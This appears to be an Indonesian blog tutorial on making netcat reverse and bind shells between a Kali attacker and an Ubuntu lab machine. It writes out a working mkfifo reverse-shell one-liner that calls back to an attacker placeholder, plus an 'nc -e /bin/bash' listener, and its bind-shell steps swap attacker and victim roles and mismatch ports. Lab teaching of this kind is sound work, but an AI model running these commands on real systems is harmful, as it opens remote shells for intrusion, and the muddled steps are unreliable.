[TUTORIAL-6] Cara Melakukan Netcat Reverse Shell dan Bind Shell pada Linux Ubuntu Server

yudiasaharahap
4 min readApr 5, 2022

--

Hallo teman-teman researcher kali ini saya ingin membuat tulisan terkait bagaimana cara melakukan Netcat Reverse Shell dan Bind Shell pada linux Ubuntu server.

apa itu reverse shell ?

Reverse Shell adalah suatu kondisi dimana komputer penyerang/attacker dapat terhubungkan ke komputer target, dimana komputer penyerang/attacker pada kondisi mendengarkan (listening) untuk mengambil shell. untuk mendapatkan shell terget.

Apa itu bind shell ?

Bind shell adalah kebalikan dari Reverse Shell, yaitu shell yang dimulai dari attacker mencoba menghubungkan ke target, yang mana target berada pada kondisi mendengarkan (listening).

Ada banyak metode untuk melakukannya. Pada kesempatan ini kita akan mencoba menggunakan netcat saja.

Pada percobaan kali ini kita asumsikan komputer korban(ubuntu) memiliki ip address 192.168.233.134 Sedangkan komputer penyerang/attacker(kali) memiliki ip address 192.168.233.129, banyak yang bertanya, bagaimana menjalankan command tersebut di komputer sasaran? Banyak cara, yang jelas kita harus mendapatkan akses ke komputer korban atau bisa menjalankan command ke komputer korban, misalnya kita punya webshell di komputer korban, “atau kita ada orang dalam hahaha” yang sudah siap sedia di komputer korban untuk menjalankan perintah kita. Intinya kita harus bisa mengirimkan perintah ke komputer korban dan bisa saling berkomunikasi/ping, baik melalui rfi, webshell, lfi, rce, dll.

Komputer Penyerang/Attacker(kali)
Komputer Korban(Ubuntu)

A. Reverse Shell

Pertama-tama ketikkan perintah “nc -lvp 4444” pada komputer penyerang/ attacker menjadi listener

· l untuk mode listen pada koneksi yang masuk

· v untuk verbose

· p [port] untuk spesifik port number

seperti illustrator gambar berikut.

Lalu lakukan perintah dibawah ini pada komputer korban, supaya shell dapat berjalan.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP ATTACKER> 1234 >/tmp/f

Dapat dilihat pada session komputer penyerang/attacker, ada log informasi connect to 192.168.233.129 form 192.168.223.134 yang berarti komputer penyerang dapat terkoneksi dan memliki hak akses pada komputer korban.

Uji coba pembuatan folder mkdir berhasilbuatfolder

Dapat terlihat pada komputer korban, folder telah berhasil dibuat.

Kita telah berhasil melakukan reverse shell pada komputer korban/ubuntu. selanjutnya kita akan mencoba bind shell.

A. Bind Shell

Kita coba buat folder satu dua tiga empat lima pada komputer penyerang/attacker,

┌──(root㉿kali)-[/home]

└─# mkdir satu dua tiga empat lima

Lakukan perintah berikut pada komputer penyerang/attacker.

nc -nvlp 1234 -e /bin/bash

Selanjutnya pada perangkat korban jalankan syntax berikut.

nc -nv <PORT ATTACKER> 1234

kalau kita berhasil, akan ada pesan di komputer korban

“connection to 192.168.233.129 1234 port [tcp/*] successed!

Dan coba buat folder melalui pada komputer korban, seperti gambar illustrator dibawah ini.

Pada komputer penyerang/attacker juga terilhat informasi connect seperti halnya komputer korban.

Dapat dilihat pada komputer penyerang/attacker folder telah terbuat.

Reverse shell dan bind shell menggunakan netcut sudah berhasil dilakukan.

referensi

--

--

No responses yet